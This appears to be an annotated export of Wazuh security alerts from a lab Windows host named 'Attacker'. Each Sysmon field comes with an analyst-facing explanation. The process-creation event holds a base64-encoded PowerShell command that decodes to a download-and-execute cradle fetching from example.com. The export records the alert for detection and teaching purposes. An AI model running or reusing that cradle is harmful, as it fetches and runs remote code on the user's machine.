data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:18.662 ProcessGuid: {94294ddc-bca6-680a-900a-000000000e00} ProcessId: 13940 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bca4-680a-8e0a-000000000e00} ParentProcessId: 13604 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:18.662
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bca6-680a-900a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13940
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bca4-680a-8e0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13604
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:48.274+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:48.274+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534208.864509
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:20.0085076Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281759
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:19.991 ProcessGuid: {94294ddc-bca6-680a-900a-000000000e00} ProcessId: 13940 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_if1icrzi.oi2.ps1 CreationUtcTime: 2025-04-24 22:35:19.989 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:19.991
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bca6-680a-900a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13940
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_if1icrzi.oi2.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:19.989
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:48.319+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:48.319+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534208.867277
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:25.2990647Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281809
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:25.289 ProcessGuid: {94294ddc-bcac-680a-950a-000000000e00} ProcessId: 10760 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_umgehqh1.lii.ps1 CreationUtcTime: 2025-04-24 22:35:25.289 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:25.289
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcac-680a-950a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10760
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_umgehqh1.lii.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:25.289
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:48.399+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:48.399+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534208.870045
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:27.3616052Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281843
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:27.354 ProcessGuid: {94294ddc-bcad-680a-970a-000000000e00} ProcessId: 9580 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_sqqlcpdl.oin.ps1 CreationUtcTime: 2025-04-24 22:35:27.354 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:27.354
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcad-680a-970a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9580
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_sqqlcpdl.oin.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:27.354
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:48.498+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:48.498+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534208.872809
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:32.4516011Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281891
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:32.449 ProcessGuid: {94294ddc-bcb3-680a-9b0a-000000000e00} ProcessId: 2732 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_okjzviqs.4g5.ps1 CreationUtcTime: 2025-04-24 22:35:32.449 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:32.449
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcb3-680a-9b0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2732
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_okjzviqs.4g5.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:32.449
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:48.498+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:48.498+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534208.875573
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:32.2957666Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281890
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
